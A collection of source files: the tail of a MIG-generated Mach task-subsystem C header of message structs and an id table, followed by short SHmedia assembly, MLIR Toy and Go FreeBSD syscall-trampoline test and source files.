mach_msg_header_t Head;
NDR_record_t NDR;
thread_state_flavor_t flavor;
mach_msg_type_number_t new_stateCnt;
natural_t new_state[144];
} __Request__thread_create_running_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t new_port;
/* end of the kernel processed data */
NDR_record_t NDR;
exception_mask_t exception_mask;
exception_behavior_t behavior;
thread_state_flavor_t new_flavor;
} __Request__task_set_exception_ports_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
exception_mask_t exception_mask;
} __Request__task_get_exception_ports_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t new_port;
/* end of the kernel processed data */
NDR_record_t NDR;
exception_mask_t exception_mask;
exception_behavior_t behavior;
thread_state_flavor_t new_flavor;
} __Request__task_swap_exception_ports_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
int n_ulocks;
int policy;
} __Request__lock_set_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t lock_set;
/* end of the kernel processed data */
} __Request__lock_set_destroy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
int policy;
int value;
} __Request__semaphore_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t semaphore;
/* end of the kernel processed data */
} __Request__semaphore_destroy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
task_policy_flavor_t flavor;
mach_msg_type_number_t policy_infoCnt;
integer_t policy_info[16];
} __Request__task_policy_set_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
task_policy_flavor_t flavor;
mach_msg_type_number_t policy_infoCnt;
boolean_t get_default;
} __Request__task_policy_get_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t reply;
/* end of the kernel processed data */
} __Request__task_sample_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
policy_t policy;
mach_msg_type_number_t baseCnt;
integer_t base[5];
boolean_t set_limit;
boolean_t change;
} __Request__task_policy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
vm_address_t routine_entry_pt;
int routine_number;
} __Request__task_set_emulation_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__task_get_emulation_vector_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_ool_descriptor_t emulation_vector;
/* end of the kernel processed data */
NDR_record_t NDR;
int vector_start;
mach_msg_type_number_t emulation_vectorCnt;
} __Request__task_set_emulation_vector_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
vm_address_t basepc;
vm_address_t boundspc;
} __Request__task_set_ras_pc_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t new_set;
/* end of the kernel processed data */
NDR_record_t NDR;
boolean_t assign_threads;
} __Request__task_assign_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
boolean_t assign_threads;
} __Request__task_assign_default_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__task_get_assignment_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t pset;
/* end of the kernel processed data */
NDR_record_t NDR;
policy_t policy;
mach_msg_type_number_t baseCnt;
integer_t base[5];
mach_msg_type_number_t limitCnt;
integer_t limit[1];
boolean_t change;
} __Request__task_set_policy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
thread_state_flavor_t flavor;
mach_msg_type_number_t old_stateCnt;
} __Request__task_get_state_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
thread_state_flavor_t flavor;
mach_msg_type_number_t new_stateCnt;
natural_t new_state[144];
} __Request__task_set_state_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#endif /* !__Request__task_subsystem__defined */
/* union of all requests */
#ifndef __RequestUnion__task_subsystem__defined
#define __RequestUnion__task_subsystem__defined
/* Union of every request message in the task subsystem.  MIG emits this
 * only so clients/servers can size a receive buffer with sizeof(); it is
 * never used as an actual message type (see the "Caution" note above:
 * real messages may be smaller and laid out differently). */
union __RequestUnion__task_subsystem {
__Request__task_create_t Request_task_create;
__Request__task_terminate_t Request_task_terminate;
__Request__task_threads_t Request_task_threads;
__Request__mach_ports_register_t Request_mach_ports_register;
__Request__mach_ports_lookup_t Request_mach_ports_lookup;
__Request__task_info_t Request_task_info;
__Request__task_set_info_t Request_task_set_info;
__Request__task_suspend_t Request_task_suspend;
__Request__task_resume_t Request_task_resume;
__Request__task_get_special_port_t Request_task_get_special_port;
__Request__task_set_special_port_t Request_task_set_special_port;
__Request__thread_create_t Request_thread_create;
__Request__thread_create_running_t Request_thread_create_running;
__Request__task_set_exception_ports_t Request_task_set_exception_ports;
__Request__task_get_exception_ports_t Request_task_get_exception_ports;
__Request__task_swap_exception_ports_t Request_task_swap_exception_ports;
__Request__lock_set_create_t Request_lock_set_create;
__Request__lock_set_destroy_t Request_lock_set_destroy;
__Request__semaphore_create_t Request_semaphore_create;
__Request__semaphore_destroy_t Request_semaphore_destroy;
__Request__task_policy_set_t Request_task_policy_set;
__Request__task_policy_get_t Request_task_policy_get;
__Request__task_sample_t Request_task_sample;
__Request__task_policy_t Request_task_policy;
__Request__task_set_emulation_t Request_task_set_emulation;
__Request__task_get_emulation_vector_t Request_task_get_emulation_vector;
__Request__task_set_emulation_vector_t Request_task_set_emulation_vector;
__Request__task_set_ras_pc_t Request_task_set_ras_pc;
__Request__task_assign_t Request_task_assign;
__Request__task_assign_default_t Request_task_assign_default;
__Request__task_get_assignment_t Request_task_get_assignment;
__Request__task_set_policy_t Request_task_set_policy;
__Request__task_get_state_t Request_task_get_state;
__Request__task_set_state_t Request_task_set_state;
};
#endif /* !__RequestUnion__task_subsystem__defined */
/* typedefs for all replies */
#ifndef __Reply__task_subsystem__defined
#define __Reply__task_subsystem__defined
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t child_task;
/* end of the kernel processed data */
} __Reply__task_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_terminate_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_ool_ports_descriptor_t act_list;
/* end of the kernel processed data */
NDR_record_t NDR;
mach_msg_type_number_t act_listCnt;
} __Reply__task_threads_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__mach_ports_register_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_ool_ports_descriptor_t init_port_set;
/* end of the kernel processed data */
NDR_record_t NDR;
mach_msg_type_number_t init_port_setCnt;
} __Reply__mach_ports_lookup_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
mach_msg_type_number_t task_info_outCnt;
integer_t task_info_out[10];
} __Reply__task_info_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_info_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_suspend_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_resume_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t special_port;
/* end of the kernel processed data */
} __Reply__task_get_special_port_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_special_port_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t child_act;
/* end of the kernel processed data */
} __Reply__thread_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t child_act;
/* end of the kernel processed data */
} __Reply__thread_create_running_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_exception_ports_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t old_handlers[32];
/* end of the kernel processed data */
NDR_record_t NDR;
mach_msg_type_number_t masksCnt;
exception_mask_t masks[32];
exception_behavior_t old_behaviors[32];
thread_state_flavor_t old_flavors[32];
} __Reply__task_get_exception_ports_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t old_handlerss[32];
/* end of the kernel processed data */
NDR_record_t NDR;
mach_msg_type_number_t masksCnt;
exception_mask_t masks[32];
exception_behavior_t old_behaviors[32];
thread_state_flavor_t old_flavors[32];
} __Reply__task_swap_exception_ports_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t new_lock_set;
/* end of the kernel processed data */
} __Reply__lock_set_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__lock_set_destroy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t semaphore;
/* end of the kernel processed data */
} __Reply__semaphore_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__semaphore_destroy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_policy_set_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
mach_msg_type_number_t policy_infoCnt;
integer_t policy_info[16];
boolean_t get_default;
} __Reply__task_policy_get_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_sample_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_policy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_emulation_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_ool_descriptor_t emulation_vector;
/* end of the kernel processed data */
NDR_record_t NDR;
int vector_start;
mach_msg_type_number_t emulation_vectorCnt;
} __Reply__task_get_emulation_vector_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_emulation_vector_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_ras_pc_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_assign_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_assign_default_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t assigned_set;
/* end of the kernel processed data */
} __Reply__task_get_assignment_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_policy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
mach_msg_type_number_t old_stateCnt;
natural_t old_state[144];
} __Reply__task_get_state_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_state_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#endif /* !__Reply__task_subsystem__defined */
/* union of all replies */
#ifndef __ReplyUnion__task_subsystem__defined
#define __ReplyUnion__task_subsystem__defined
/* Union of every reply message in the task subsystem; like the request
 * union above, it exists only so sizeof() yields the maximum possible
 * reply size for buffer allocation. */
union __ReplyUnion__task_subsystem {
__Reply__task_create_t Reply_task_create;
__Reply__task_terminate_t Reply_task_terminate;
__Reply__task_threads_t Reply_task_threads;
__Reply__mach_ports_register_t Reply_mach_ports_register;
__Reply__mach_ports_lookup_t Reply_mach_ports_lookup;
__Reply__task_info_t Reply_task_info;
__Reply__task_set_info_t Reply_task_set_info;
__Reply__task_suspend_t Reply_task_suspend;
__Reply__task_resume_t Reply_task_resume;
__Reply__task_get_special_port_t Reply_task_get_special_port;
__Reply__task_set_special_port_t Reply_task_set_special_port;
__Reply__thread_create_t Reply_thread_create;
__Reply__thread_create_running_t Reply_thread_create_running;
__Reply__task_set_exception_ports_t Reply_task_set_exception_ports;
__Reply__task_get_exception_ports_t Reply_task_get_exception_ports;
__Reply__task_swap_exception_ports_t Reply_task_swap_exception_ports;
__Reply__lock_set_create_t Reply_lock_set_create;
__Reply__lock_set_destroy_t Reply_lock_set_destroy;
__Reply__semaphore_create_t Reply_semaphore_create;
__Reply__semaphore_destroy_t Reply_semaphore_destroy;
__Reply__task_policy_set_t Reply_task_policy_set;
__Reply__task_policy_get_t Reply_task_policy_get;
__Reply__task_sample_t Reply_task_sample;
__Reply__task_policy_t Reply_task_policy;
__Reply__task_set_emulation_t Reply_task_set_emulation;
__Reply__task_get_emulation_vector_t Reply_task_get_emulation_vector;
__Reply__task_set_emulation_vector_t Reply_task_set_emulation_vector;
__Reply__task_set_ras_pc_t Reply_task_set_ras_pc;
__Reply__task_assign_t Reply_task_assign;
__Reply__task_assign_default_t Reply_task_assign_default;
__Reply__task_get_assignment_t Reply_task_get_assignment;
__Reply__task_set_policy_t Reply_task_set_policy;
__Reply__task_get_state_t Reply_task_get_state;
__Reply__task_set_state_t Reply_task_set_state;
};
#endif /* !__ReplyUnion__task_subsystem__defined */
#ifndef subsystem_to_name_map_task
/* Routine-name / message-id table for the task subsystem (ids start at
 * 3400).  NOTE(review): id 3428 is absent from this table -- presumably a
 * retired routine slot; keep the gap so the remaining ids stay in sync
 * with the kernel side of the interface. */
#define subsystem_to_name_map_task \
{ "task_create", 3400 },\
{ "task_terminate", 3401 },\
{ "task_threads", 3402 },\
{ "mach_ports_register", 3403 },\
{ "mach_ports_lookup", 3404 },\
{ "task_info", 3405 },\
{ "task_set_info", 3406 },\
{ "task_suspend", 3407 },\
{ "task_resume", 3408 },\
{ "task_get_special_port", 3409 },\
{ "task_set_special_port", 3410 },\
{ "thread_create", 3411 },\
{ "thread_create_running", 3412 },\
{ "task_set_exception_ports", 3413 },\
{ "task_get_exception_ports", 3414 },\
{ "task_swap_exception_ports", 3415 },\
{ "lock_set_create", 3416 },\
{ "lock_set_destroy", 3417 },\
{ "semaphore_create", 3418 },\
{ "semaphore_destroy", 3419 },\
{ "task_policy_set", 3420 },\
{ "task_policy_get", 3421 },\
{ "task_sample", 3422 },\
{ "task_policy", 3423 },\
{ "task_set_emulation", 3424 },\
{ "task_get_emulation_vector", 3425 },\
{ "task_set_emulation_vector", 3426 },\
{ "task_set_ras_pc", 3427 },\
{ "task_assign", 3429 },\
{ "task_assign_default", 3430 },\
{ "task_get_assignment", 3431 },\
{ "task_set_policy", 3432 },\
{ "task_get_state", 3433 },\
{ "task_set_state", 3434 }
#endif
#ifdef __AfterMigUserHeader
__AfterMigUserHeader
#endif /* __AfterMigUserHeader */
#endif /* _task_user_ */
| {
"language": "Assembly"
} |
# sh testcase for float.ld $frgh, $drf -*- Asm -*-
# mach: all
# as: -isa=shmedia
# ld: -m shelf64
.include "media/testutils.inc"
start
# Put the integer 1 in r0, then move its bit pattern into the
# single-precision FP register fr0 (fmov.ls: general reg -> FP reg).
movi 1, r0
fmov.ls r0, fr0
# Instruction under test: float.ld converts the value in fr0 into a
# double in dr0 (presumably integer-in-FP-reg to double, per the title
# line -- confirm against the SH-5/SHmedia ISA manual).  "pass" reports
# success as long as execution reaches it without a trap.
float.ld fr0, dr0
pass
| {
"language": "Assembly"
} |
# RUN: toyc-ch3 %s -emit=mlir -opt 2>&1 | FileCheck %s
# With -opt, the copies of `a` through `b` and `c` (same <2,1> shape, so
# the reshapes are no-ops) fold away, leaving a single constant feeding
# the print -- which is exactly what the directives below verify.
def main() {
var a<2,1> = [1, 2];
var b<2,1> = a;
var c<2,1> = b;
print(c);
}
# CHECK-LABEL: func @main()
# CHECK-NEXT: [[VAL_0:%.*]] = toy.constant
# CHECK-SAME: dense<[
# CHECK-SAME: [1.000000e+00], [2.000000e+00]
# CHECK-SAME: ]> : tensor<2x1xf64>
# CHECK-NEXT: toy.print [[VAL_0]] : tensor<2x1xf64>
# CHECK-NEXT: toy.return
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for AMD64, FreeBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
// Syscall is a tail-call trampoline into syscall.Syscall so the runtime's
// syscall bookkeeping applies.  $0-56: no local frame; 56 bytes of caller
// args+results (trap + 3 args + 3 results, 8 bytes each).
TEXT ·Syscall(SB),NOSPLIT,$0-56
JMP syscall·Syscall(SB)
// Syscall6 trampolines to syscall.Syscall6.  $0-80: no local frame;
// 80 bytes of caller args+results (trap + 6 args + 3 results).
TEXT ·Syscall6(SB),NOSPLIT,$0-80
JMP syscall·Syscall6(SB)
// Syscall9 trampolines to syscall.Syscall9.  $0-104: no local frame;
// 104 bytes of caller args+results (trap + 9 args + 3 results).
TEXT ·Syscall9(SB),NOSPLIT,$0-104
JMP syscall·Syscall9(SB)
// RawSyscall trampolines to syscall.RawSyscall -- the "raw" variant skips
// the runtime's entersyscall/exitsyscall handling, so it is presumably
// reserved for calls that cannot block.  Frame layout matches Syscall.
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
JMP syscall·RawSyscall(SB)
// RawSyscall6 trampolines to syscall.RawSyscall6 (raw, 6-argument form).
// Frame layout matches Syscall6.
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |